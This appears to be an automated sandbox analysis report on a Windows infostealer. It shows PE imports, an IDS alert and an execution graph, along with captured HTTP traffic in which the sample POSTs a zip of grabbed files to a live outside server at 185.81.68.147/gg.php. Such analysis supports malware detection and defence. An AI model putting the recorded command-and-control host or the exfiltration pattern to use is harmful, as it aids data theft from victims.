                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xdbde00x140.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0xb70000x7e8.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000xb5d7c0xb5e00d7e72deaccbc9205e6bc310cd6098fe6False0.5400034901202749data6.440800793292747IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0xb70000x344e20x3460055025f43fbc517ce7aa839199117fe23False0.4170457935560859data5.663833879167456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xec0000x48600x2600c1ae93d64e938c8a0fe0789fea8b70feFalse0.16067023026315788data3.0636855498834743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .pdata0xf10000x96240x98004b7f167d15280ea685ab8ea334f409c5False0.4794664884868421data5.963337602955454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xfb0000x14b80x16009b08558e21bdd3c130be2b0f3248011cFalse0.3781960227272727data5.32421049706391IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  DLLImport
                  USER32.dllGetDesktopWindow, GetClientRect, wsprintfW, GetSystemMetrics, GetDC
                  ADVAPI32.dllCryptHashData, CryptEncrypt, CryptImportKey, CryptDestroyKey, CryptDestroyHash, CryptCreateHash, GetUserNameA, GetCurrentHwProfileA, CryptAcquireContextA, CryptReleaseContext, CryptGetHashParam
                  GDI32.dllDeleteObject, SelectObject, CreateCompatibleBitmap, BitBlt, CreateCompatibleDC
                  gdiplus.dllGdipDisposeImage, GdipAlloc, GdipGetImageEncodersSize, GdipSaveImageToFile, GdiplusStartup, GdipGetImageEncoders, GdipCreateBitmapFromHBITMAP, GdipCloneImage, GdipFree, GdiplusShutdown
                  SHLWAPI.dllStrCmpIW, PathFindExtensionW
                  bcrypt.dllBCryptGenRandom
                  KERNEL32.dllCreateProcessW, GetExitCodeProcess, FlushFileBuffers, SetStdHandle, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, LoadLibraryA, GetProcAddress, HeapAlloc, GetProcessHeap, HeapFree, SetLastError, VirtualFree, VirtualAlloc, FreeLibrary, GetLastError, DeleteFileW, RaiseException, SetCurrentDirectoryW, GetModuleHandleW, CreateDirectoryW, GetSystemFirmwareTable, GetModuleFileNameA, FindFirstFileW, FindNextFileW, GetLocaleInfoEx, GetUserDefaultUILanguage, FindClose, WaitForSingleObject, CreateFileW, GetVersionExA, CloseHandle, GetSystemInfo, GlobalMemoryStatusEx, CopyFileW, GetComputerNameA, TerminateProcess, RemoveDirectoryW, FindFirstFileA, FindNextFileA, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, EnterCriticalSection, GetOEMCP, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceFrequency, GetSystemDirectoryA, GetModuleHandleA, SleepEx, QueryPerformanceCounter, GetTickCount, Sleep, MultiByteToWideChar, WideCharToMultiByte, FormatMessageW, SetEndOfFile, WaitForSingleObjectEx, GetEnvironmentVariableA, GetStdHandle, GetFileType, ReadFile, PeekNamedPipe, WaitForMultipleObjects, GetCurrentProcessId, VerSetConditionMask, VerifyVersionInfoW, CreateFileA, GetFileSizeEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetStringTypeW, LCMapStringEx, EncodePointer, DecodePointer, CompareStringEx, RtlUnwind, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, GetFullPathNameW, GetCurrentDirectoryW, HeapReAlloc, GetConsoleOutputCP, ReadConsoleW, GetConsoleMode, ExitProcess, GetModuleFileNameW, WriteFile, SetFilePointerEx, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetFileInformationByHandle, GetDriveTypeW, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, RtlPcToFileHeader, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetFileAttributesExW, FindFirstFileExW, IsValidCodePage, MoveFileExA, GetACP, SetEnvironmentVariableW, GetTimeZoneInformation, HeapSize, WriteConsoleW, LeaveCriticalSection, GetCPInfo, RtlUnwindEx
                  WS2_32.dllWSAIoctl, socket, setsockopt, recv, htons, getsockname, getpeername, select, bind, WSACleanup, WSAStartup, WSASetLastError, ntohs, WSAGetLastError, closesocket, WSAWaitForMultipleEvents, WSAResetEvent, WSAEventSelect, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent, send, getsockopt, accept, __WSAFDIsSet, gethostname, htonl, listen, getaddrinfo, freeaddrinfo, recvfrom, ioctlsocket, sendto, connect
                  CRYPT32.dllCryptQueryObject, CertCreateCertificateChainEngine, CertFreeCertificateChainEngine, CertGetCertificateChain, CertFreeCertificateChain, CertGetNameStringA, CertFindExtension, CertAddCertificateContextToStore, CryptDecodeObjectEx, PFXImportCertStore, CryptStringToBinaryA, CertFreeCertificateContext, CertFindCertificateInStore, CertEnumCertificatesInStore, CertCloseStore, CertOpenStore
                  WLDAP32.dll
                  Normaliz.dllIdnToUnicode, IdnToAscii
                  NameOrdinalAddress
                  ?ReflectiveLoader@@YA_KXZ10x1400ace34
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-12-26T12:04:19.428611+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.2.649733185.81.68.14780TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Dec 26, 2024 12:04:19.022615910 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.142203093 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.142359972 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.145828962 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.265773058 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265796900 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265811920 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265825987 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265853882 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265867949 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265882969 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265897036 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265901089 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.265923023 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265937090 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.265963078 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.266015053 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.385525942 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.385560036 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.385605097 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.385643959 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.385689974 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.385734081 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.385746956 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.385761023 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.385792971 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.385807991 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.428467035 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.428611040 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.548437119 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.549288034 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.592350006 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.712435961 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.713485956 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:19.916455030 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:19.916661024 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:20.160584927 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:20.226600885 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:21.497129917 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:21.497384071 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:21.497442007 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:21.497493029 CET4973380192.168.2.6185.81.68.147
                  Dec 26, 2024 12:04:21.617589951 CET8049733185.81.68.147192.168.2.6
                  Dec 26, 2024 12:04:21.617935896 CET4973380192.168.2.6185.81.68.147
                  • 185.81.68.147
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649733185.81.68.147804144C:\Users\user\Desktop\CwQQqCmqkY.exe
                  TimestampBytes transferredDirectionData
                  Dec 26, 2024 12:04:19.145828962 CET12360OUTPOST /gg.php HTTP/1.1
                  Host: 185.81.68.147
                  Accept: */*
                  Content-Length: 88734
                  Content-Type: multipart/form-data; boundary=------------------------A4fnrY2DGEqCNctsQoPM3r
                  Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 34 66 6e 72 59 32 44 47 45 71 43 4e 63 74 73 51 6f 50 4d 33 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc [TRUNCATED]
                  Data Ascii: --------------------------A4fnrY2DGEqCNctsQoPM3rContent-Disposition: form-data; name="log"; filename="LogFile.zip"Content-Type: application/zipPK j-\File_Grabber\0.1.filtertrie.intermediate.txt34PK h-\File_Grabber\0.2.filtertrie.intermediate.txt34PK >M!\File_Grabber\1-7FeatureCache.txt]R[!@"$mGBj[m6o_oWqN6;<V+H3=lU#v/iY<=2BM;t",2Q[iLmFKK%w WaR!fbp}rtV6NisV;':Y3gusJ"G!:g][:{CjA>7{yiU85QZetn0}7h|PK F8PX#\File_Grabber\AlternateServices.txt] 0b&BX~h+(:|uqfYY1o*V>3~=dcbDbt-35rGU7PK \File_Grabber\eventbeacons.datPK 0\File_Grabber\hub-signature.txte6E?V%M3`[h&$6e>Nw%U}5,NeTq^a$Na'FYYx7NJ% [TRUNCATED]
                  Dec 26, 2024 12:04:19.265901089 CET9888OUTData Raw: 4f c3 aa e3 85 a3 65 cc d0 a9 76 f6 9d 95 3e ca 22 7b cd 1d 8a 97 33 eb 8c 9f bf 46 2e c4 23 a7 ae d6 75 38 5d 78 32 3f bf 7e 50 9b 59 27 35 16 17 21 8a 22 26 a1 f5 9e ac 8d ad 34 6d df 7a e4 21 ce 5c 56 60 ed 52 e4 f1 67 4c f1 65 15 5a e8 4e fc
                  Data Ascii: Oev>"{3F.#u8]x2?~PY'5!"&4mz!\V`RgLeZN{DyZ)1Q^,}zsps,U2YU9udr'VVNP{?4eM~BZP%$[cPi<y6'Q>jx
                  Dec 26, 2024 12:04:19.265963078 CET12360OUTData Raw: 9b 4e 58 51 fd 16 0d 3f 35 f1 c5 61 ce ae ae 6a 0f 27 3e 9d c9 c7 61 28 cb 85 d9 f1 a7 2a 65 a9 18 7b b4 e1 b3 5e 68 76 c8 7f 33 60 22 c2 1e 71 9f 03 ce b8 f1 ae de f0 7a f7 54 00 90 aa 1a d4 cf 7e 79 6f 2c 87 e9 58 a3 8e 04 3c 50 7c f8 8c 38 99
                  Data Ascii: NXQ?5aj'>a(*e{^hv3`"qzT~yo,X<P|8Smr[%E+o/{g/u`b^:{>m:@v}wvrL.siXV,sD&uY(U^k'7!K^yUL9]m60w([
                  Dec 26, 2024 12:04:19.266015053 CET2472OUTData Raw: 59 2b 38 aa 24 bc 02 17 b8 79 35 1a 26 ac 8b 43 4a 2b 93 02 22 e5 96 01 b9 a9 b6 4a ab d4 d5 9a d1 09 29 5f 73 17 cc 43 3b fd 1e 0d 3f 51 5b a5 32 9d 40 31 3b d4 bf d3 78 62 ee 0f a3 98 37 8c 67 98 cb 61 d5 b0 8e 29 1b 3a 1a 82 32 bc 33 8f de 0b
                  Data Ascii: Y+8$y5&CJ+"J)_sC;?Q[2@1;xb7ga):23ZtHxeO|Msxks!Cv9rFHg6~;-UPD%]PW5[^VVPi5RW>r}<-F({
                  Dec 26, 2024 12:04:19.385689974 CET7416OUTData Raw: f9 d0 90 38 9a c7 60 7a f9 4d a9 22 95 8a 9e 92 d3 ee 6d be 07 d4 69 1b 0b d1 aa 56 ae 96 dc 02 77 af 08 88 3b b9 2c bd 3f 13 f0 17 bc 6b 06 bd 13 39 ae be ee 34 9a f1 b0 f6 5a 6d 9d 53 d6 f8 0d 82 c7 75 77 3f 34 aa 1d 66 ea 91 cc 5b c5 d7 2c 10
                  Data Ascii: 8`zM"miVw;,?k94ZmSuw?4f[,}*M<n&!I:P|#kkCmvM<<86B'n}lD3\;>,e"nZ&eix|-dFL
                  Dec 26, 2024 12:04:19.385746956 CET2472OUTData Raw: 2f 5c cd 46 41 c4 d4 fa 32 70 64 33 09 8d 85 df a3 d0 54 57 a6 04 cc ac e2 3c f0 28 f2 08 91 75 18 6a fe 3d 94 0e 00 ed a1 29 dd a1 22 be b8 1e 91 4c ac 23 81 c6 88 e5 7e c8 dd f5 1a 12 e8 31 52 44 df 73 62 6b 85 38 b7 95 cb 19 f2 aa 37 2b 8a d5
                  Data Ascii: /\FA2pd3TW<(uj=)"L#~1RDsbk87+4K+'xh-80H=_L$|iG!GC8pns8C-+^YKoUj<&vONNoI)!{ux?;:~k6p
                  Dec 26, 2024 12:04:19.385792971 CET2472OUTData Raw: d8 20 1c 02 89 3d d2 62 51 a2 35 4c f8 df d1 91 3b 93 30 c3 8f 9a cc 30 e7 de 73 64 6f d1 d5 70 cc 11 91 c2 e4 ea 2a 98 3d e2 3f 80 f4 c7 1e f5 a2 c1 e9 da 52 ba a9 40 be 67 83 1d 45 aa 66 4b 3f 25 e6 8d dc 1d 9d e4 ac d5 0f fa 69 b8 fc f5 70 e7
                  Data Ascii: =bQ5L;00sdop*=?R@gEfK?%ip2uv'mG:-@J?!__>,^l1D~JcQ"@K_pLz~;2#w-}{d7Mve~!IJ:]&s
                  Dec 26, 2024 12:04:19.385807991 CET2472OUTData Raw: f1 4b 7e 3e e6 f1 ab f4 1d 75 cf a7 c8 77 72 ce bc 53 71 4f 79 b2 54 dd 98 32 85 f6 de a5 c6 7b a6 de a6 1d 55 df 89 6a 51 97 27 84 f0 cf c6 c4 a0 ee 8d 4f a0 5c 37 21 3f f5 b3 59 d4 fb 47 36 fb ba 6b a4 09 89 7c ef f5 9d 6b 9d df d8 79 84 20 a6
                  Data Ascii: K~>uwrSqOyT2{UjQ'O\7!?YG6k|ky h(3g?yamYfY?!kW*m6'UUN|}q9}P[;rT_|PdS~+cX/"-L\:s$nF}SUM6%JQa&ZX
                  Dec 26, 2024 12:04:19.428611040 CET27192OUTData Raw: c0 1c 6f 86 39 2b b1 f1 48 46 6c 9d 8c f2 e2 01 9e 35 d6 a3 b6 05 64 57 23 03 7e 71 e4 aa 1c 69 5e ab 40 10 00 19 25 37 f0 86 40 be 63 16 c9 bb b7 4e 3c c5 8c c5 1c 17 6b 24 92 c9 36 b0 19 f2 f1 6a 90 d9 2a 24 ec ae ae 26 4a 44 21 e8 9c b3 1f 81
                  Data Ascii: o9+HFl5dW#~qi^@%7@cN<k$6j*$&JD!(yAn@TF3QU4KOp/b15Whu# h2d%r~&@,Pt@ix7s=iH2tQO*!_4QS%v[pu[U
                  Dec 26, 2024 12:04:19.549288034 CET7416OUTData Raw: 16 df c4 47 16 80 fb a7 8e 3f 20 09 66 07 92 f3 46 eb ff 7e 7f c1 db d9 20 01 50 00 35 d8 f2 06 52 0e 05 c0 dd d2 62 fd bf da 52 76 1f f6 ef 24 0f b9 90 bc 72 f0 ff 81 96 91 c3 e5 ff 10 f8 df b9 ba 3f 7c 36 f7 2f 04 ea a8 fe ef 1a e2 fc 93 25 16
                  Data Ascii: G? fF~ P5RbRv$r?|6/%1%MhLTup/KclZ&aJ:lvBHOKf">r;7Fy)'(N|UcX'>2nS"V+Xz>q8$F0W}9t."
                  Dec 26, 2024 12:04:19.713485956 CET1236OUTData Raw: 10 00 00 00 18 00 00 00 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 ed 06 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 69 63 6f 6e 63 61 63 68 65 5f 39 36 2e 64 62 50 4b 01 02 00 00 14 00 00 00 08 00 00 00 20 00 f5 fe ae 0e 10 00 00 00 18 00 00
                  Data Ascii: \File_Grabber\iconcache_96.dbPK (8\File_Grabber\iconcache_custom_stream.dbPK ?]\File_Grabber\iconcache_exif.dbPK r
                  Dec 26, 2024 12:04:21.497129917 CET147INHTTP/1.1 200 OK
                  Date: Thu, 26 Dec 2024 11:04:20 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8
                  Dec 26, 2024 12:04:21.497442007 CET147INHTTP/1.1 200 OK
                  Date: Thu, 26 Dec 2024 11:04:20 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Target ID:0
                  Start time:06:03:59
                  Start date:26/12/2024
                  Path:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\CwQQqCmqkY.exe"
                  Imagebase:0x7ff7f1280000
                  File size:1'014'784 bytes
                  MD5 hash:1A477A5659D817B01A50F2A80CB1D76E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:5.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:29.6%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:135
                    execution_graph 88664 7ff7f1304674 88665 7ff7f1304691 88664->88665 88667 7ff7f13046b3 88664->88667 88695 7ff7f130b5f0 11 API calls _Strcoll 88665->88695 88667->88665 88669 7ff7f13046bd 88667->88669 88668 7ff7f1304696 88696 7ff7f1303208 47 API calls _invalid_parameter_noinfo 88668->88696 88671 7ff7f13046c2 88669->88671 88672 7ff7f13046cf 88669->88672 88697 7ff7f130b5f0 11 API calls _Strcoll 88671->88697 88683 7ff7f131d3f0 88672->88683 88673 7ff7f13046a1 88700 7ff7f1318cb8 EnterCriticalSection 88683->88700 88695->88668 88696->88673 88697->88673 88930 7ff7f1314039 88942 7ff7f13162d0 88930->88942 88943 7ff7f131b1cc _Strcoll 47 API calls 88942->88943 88944 7ff7f13162d9 88943->88944 88947 7ff7f1319160 47 API calls BuildCatchObjectHelperInternal 88944->88947 88948 7ff7f12fa134 88971 7ff7f12fa33c 88948->88971 88951 7ff7f12fa280 88992 7ff7f12fab08 7 API calls 2 library calls 88951->88992 88952 7ff7f12fa150 __scrt_acquire_startup_lock 88954 7ff7f12fa28a 88952->88954 88955 7ff7f12fa16e 88952->88955 88993 7ff7f12fab08 7 API calls 2 library calls 88954->88993 88961 7ff7f12fa18f __scrt_release_startup_lock 88955->88961 88977 7ff7f1313ef4 88955->88977 88958 7ff7f12fa193 88959 7ff7f12fa295 BuildCatchObjectHelperInternal 88960 7ff7f12fa219 88981 7ff7f12fac50 88960->88981 88961->88958 88961->88960 88989 7ff7f1314204 47 API calls __GSHandlerCheck_EH 88961->88989 88963 7ff7f12fa21e 88984 7ff7f132d390 88963->88984 88972 7ff7f12fa344 88971->88972 88973 7ff7f12fa350 __scrt_dllmain_crt_thread_attach 88972->88973 88974 7ff7f12fa35d 88973->88974 88976 7ff7f12fa148 88973->88976 88974->88976 88994 7ff7f12ff158 7 API calls 2 library calls 88974->88994 88976->88951 88976->88952 88978 7ff7f1313f07 88977->88978 88979 7ff7f1313f2e 88978->88979 88995 7ff7f12fa050 88978->88995 88979->88961 89066 7ff7f1333300 88981->89066 88983 7ff7f12fac67 GetStartupInfoW 88983->88963 89068 7ff7f132c660 88984->89068 88989->88960 88992->88954 88993->88959 88994->88976 88996 7ff7f12fa060 88995->88996 89012 7ff7f1314280 88996->89012 88998 7ff7f12fa06c 89018 7ff7f12fa378 88998->89018 89001 7ff7f12fa105 89001->88978 89002 7ff7f12fa084 _RTC_Initialize 89010 7ff7f12fa0d9 89002->89010 89023 7ff7f12fa528 89002->89023 89004 7ff7f12fa099 89026 7ff7f13136ec 89004->89026 89011 7ff7f12fa0f5 89010->89011 89053 7ff7f12fab08 7 API calls 2 library calls 89010->89053 89011->88978 89013 7ff7f1314291 89012->89013 89015 7ff7f1314299 89013->89015 89054 7ff7f130b5f0 11 API calls _Strcoll 89013->89054 89015->88998 89016 7ff7f13142a8 89055 7ff7f1303208 47 API calls _invalid_parameter_noinfo 89016->89055 89019 7ff7f12fa389 89018->89019 89022 7ff7f12fa38e __scrt_acquire_startup_lock 89018->89022 89019->89022 89056 7ff7f12fab08 7 API calls 2 library calls 89019->89056 89021 7ff7f12fa402 89022->89002 89057 7ff7f12fa4ec 89023->89057 89025 7ff7f12fa531 89025->89004 89027 7ff7f12fa0a5 89026->89027 89028 7ff7f131370c 89026->89028 89027->89010 89052 7ff7f12faab4 InitializeSListHead 89027->89052 89029 7ff7f131372a GetModuleFileNameW 89028->89029 89030 7ff7f1313714 89028->89030 89034 7ff7f1313755 89029->89034 89062 7ff7f130b5f0 11 API calls _Strcoll 89030->89062 89032 7ff7f1313719 89063 7ff7f1303208 47 API calls _invalid_parameter_noinfo 89032->89063 89064 7ff7f131368c 11 API calls 2 library calls 89034->89064 89036 7ff7f1313795 89037 7ff7f131379d 89036->89037 89042 7ff7f13137b5 89036->89042 89065 7ff7f130b5f0 11 API calls _Strcoll 89037->89065 89039 7ff7f13137a2 89040 7ff7f131b6e0 __free_lconv_mon 11 API calls 89039->89040 89043 7ff7f13137b0 89040->89043 89041 7ff7f13137d7 89044 7ff7f131b6e0 __free_lconv_mon 11 API calls 89041->89044 89042->89041 89045 7ff7f131381c 89042->89045 89046 7ff7f1313803 89042->89046 89043->89027 89044->89027 89049 7ff7f131b6e0 __free_lconv_mon 11 API calls 89045->89049 89047 7ff7f131b6e0 __free_lconv_mon 11 API calls 89046->89047 89048 7ff7f131380c 89047->89048 89050 7ff7f131b6e0 __free_lconv_mon 11 API calls 89048->89050 89049->89041 89051 7ff7f1313818 89050->89051 89051->89027 89053->89001 89054->89016 89055->89015 89056->89021 89058 7ff7f12fa506 89057->89058 89060 7ff7f12fa4ff shared_ptr 89057->89060 89061 7ff7f1316110 50 API calls shared_ptr 89058->89061 89060->89025 89061->89060 89062->89032 89063->89027 89064->89036 89065->89039 89067 7ff7f13332f0 89066->89067 89067->88983 89067->89067 89261 7ff7f132cc4c LoadLibraryA 89068->89261 89071 7ff7f132cc4c 2 API calls 89072 7ff7f132c68a 89071->89072 89073 7ff7f132cc4c 2 API calls 89072->89073 89074 7ff7f132c69d 89073->89074 89075 7ff7f132cc4c 2 API calls 89074->89075 89076 7ff7f132c6b0 89075->89076 89077 7ff7f132cc4c 2 API calls 89076->89077 89078 7ff7f132c6c3 89077->89078 89264 7ff7f128ef54 89078->89264 89083 7ff7f132cc4c 2 API calls 89084 7ff7f132c6ea 89083->89084 89085 7ff7f132cc4c 2 API calls 89084->89085 89086 7ff7f132c6fd 89085->89086 89087 7ff7f132cc4c 2 API calls 89086->89087 89088 7ff7f132c710 89087->89088 89089 7ff7f132cc4c 2 API calls 89088->89089 89090 7ff7f132c723 89089->89090 89091 7ff7f132cc4c 2 API calls 89090->89091 89092 7ff7f132c736 89091->89092 89093 7ff7f132cc4c 2 API calls 89092->89093 89094 7ff7f132c749 89093->89094 89095 7ff7f132cc4c 2 API calls 89094->89095 89096 7ff7f132c75c 89095->89096 89097 7ff7f132cc4c 2 API calls 89096->89097 89098 7ff7f132c76f 89097->89098 89099 7ff7f132cc4c 2 API calls 89098->89099 89100 7ff7f132c782 89099->89100 89101 7ff7f132cc4c 2 API calls 89100->89101 89102 7ff7f132c79c 89101->89102 89103 7ff7f132cc4c 2 API calls 89102->89103 89104 7ff7f132c7b6 89103->89104 89105 7ff7f132cc4c 2 API calls 89104->89105 89106 7ff7f132c7c9 89105->89106 89107 7ff7f132cc4c 2 API calls 89106->89107 89108 7ff7f132c7dc 89107->89108 89109 7ff7f132cc4c 2 API calls 89108->89109 89110 7ff7f132c7ef 89109->89110 89111 7ff7f132cc4c 2 API calls 89110->89111 89112 7ff7f132c802 89111->89112 89113 7ff7f132cc4c 2 API calls 89112->89113 89114 7ff7f132c815 89113->89114 89115 7ff7f132cc4c 2 API calls 89114->89115 89116 7ff7f132c828 89115->89116 89117 7ff7f132cc4c 2 API calls 89116->89117 89118 7ff7f132c83b 89117->89118 89119 7ff7f128ef54 77 API calls 89118->89119 89120 7ff7f132c847 89119->89120 89121 7ff7f128f1f0 112 API calls 89120->89121 89122 7ff7f132c84f 89121->89122 89123 7ff7f132cc4c 2 API calls 89122->89123 89124 7ff7f132c862 89123->89124 89125 7ff7f128ef54 77 API calls 89124->89125 89126 7ff7f132c86e 89125->89126 89127 7ff7f128f1f0 112 API calls 89126->89127 89128 7ff7f132c876 89127->89128 89129 7ff7f132cc4c 2 API calls 89128->89129 89130 7ff7f132c889 89129->89130 89131 7ff7f132cc4c 2 API calls 89130->89131 89132 7ff7f132c89c 89131->89132 89133 7ff7f132cc4c 2 API calls 89132->89133 89134 7ff7f132c8b6 89133->89134 89135 7ff7f132cc4c 2 API calls 89134->89135 89136 7ff7f132c8c9 89135->89136 89137 7ff7f132cc4c 2 API calls 89136->89137 89138 7ff7f132c8dc 89137->89138 89139 7ff7f132cc4c 2 API calls 89138->89139 89140 7ff7f132c8ef 89139->89140 89141 7ff7f132cc4c 2 API calls 89140->89141 89142 7ff7f132c909 89141->89142 89143 7ff7f132cc4c 2 API calls 89142->89143 89144 7ff7f132c923 89143->89144 89145 7ff7f132cc4c 2 API calls 89144->89145 89146 7ff7f132c936 89145->89146 89147 7ff7f132cc4c 2 API calls 89146->89147 89148 7ff7f132c949 89147->89148 89149 7ff7f132cc4c 2 API calls 89148->89149 89150 7ff7f132c95c 89149->89150 89151 7ff7f132cc4c 2 API calls 89150->89151 89152 7ff7f132c96f 89151->89152 89153 7ff7f132cc4c 2 API calls 89152->89153 89154 7ff7f132c982 89153->89154 89155 7ff7f132cc4c 2 API calls 89154->89155 89156 7ff7f132c995 89155->89156 89157 7ff7f132cc4c 2 API calls 89156->89157 89158 7ff7f132c9af 89157->89158 89159 7ff7f132cc4c 2 API calls 89158->89159 89160 7ff7f132c9c2 89159->89160 89161 7ff7f132cc4c 2 API calls 89160->89161 89162 7ff7f132c9d5 89161->89162 89163 